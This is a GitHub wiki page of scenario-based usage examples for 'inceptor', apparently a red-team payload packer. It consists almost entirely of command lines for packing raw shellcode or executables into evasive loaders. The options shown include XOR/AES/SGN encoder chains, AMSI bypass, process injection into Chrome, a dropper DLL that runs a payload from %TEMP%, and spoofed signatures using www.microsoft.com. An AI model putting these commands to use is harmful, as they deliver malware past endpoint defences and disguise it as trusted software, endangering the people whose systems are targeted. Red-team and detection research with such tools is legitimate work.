-
-
Notifications
You must be signed in to change notification settings - Fork 267
Examples by scenario
klezVirus edited this page Sep 21, 2021
·
1 revision
This page should serve as a scenario-based reference for anyone "learning" how to use inceptor and try to take the maximum from it.
python inceptor.py native shellcode.raw -o packed.exe
python inceptor.py native shellcode.raw -o packed.dll
python inceptor.py native shellcode.raw -o packed.dll -C clang
python inceptor.py native shellcode.raw -o packed.dll -C clang
Packing of raw shellcode into native DLL, using an external definition file for exported functions (avoid name mangling)
python inceptor.py native shellcode.raw -o packed.dll --exports ".\exports.def"
Packing of raw shellcode into native EXE, and compilation of a "dropper" DLL. In the example below, the dropper DLL will write the file packed.exe
into %TEMP%
, then executing it via system("%TEMP%\packed.exe")
.
python inceptor.py native shellcode.raw -o packed.exe --dll
python inceptor.py native shellcode.raw -o packed.exe --sgn
python inceptor.py native shellcode.raw -o packed.exe -e nop -e xor
python inceptor.py native shellcode.raw -o packed.exe --clone "C:\Windows\System32\cmd.exe"
Packing of raw shellcode into native EXE, signing the binary using CarbonCopy and www.microsoft.com domain
python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com
Packing of raw shellcode into native EXE, signing the binary with LazySign and www.microsoft.com domain
python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com -so
python inceptor.py native shellcode.raw -o packed.exe -s -sd www.microsoft.com -s -ss "C:\Windows\system32\ntdll.dll"
python inceptor.py native to_pack.exe -o packed.exe -t pe2sh
python inceptor.py native to_pack.exe -o packed.exe -t donut -P
Packing of EXE into native EXE, using donut, using process injection templates, and telling the loader to inject into "Chrome"
python inceptor.py native to_pack.exe -o packed.exe -t donut -P -P0 chrome
python inceptor.py native to_pack.exe -o packed.exe --classname Namezpace.Clazz --function meth
Most of the examples above can be also used with the DotNet generator.
python inceptor.py dotnet to_pack.exe -o packed.exe -m dinvoke -m amsi
python inceptor.py dotnet to_pack.exe -o packed.exe -O
Packing an EXE as a full .NET assembly (to reflectively load via assembly load) into another dotnet, using a chain of LD encoders
python inceptor.py dotnet to_pack.exe -o packed.exe -e xor -e aes -e hex
[*] Multiple compatible templates identified, choose one:
0: assembly_load.cs
1: classic.cs
$> 1
Wrap an EXE as a full .NET assembly (to reflectively load via assembly load) into another dotnet, using a chain of LD encoders
python inceptor.py powershell to_pack.exe -o packed.ps1 -e xor -e aes -e hex
python inceptor.py dotnet to_pack.exe -o packed.exe -O -m amsi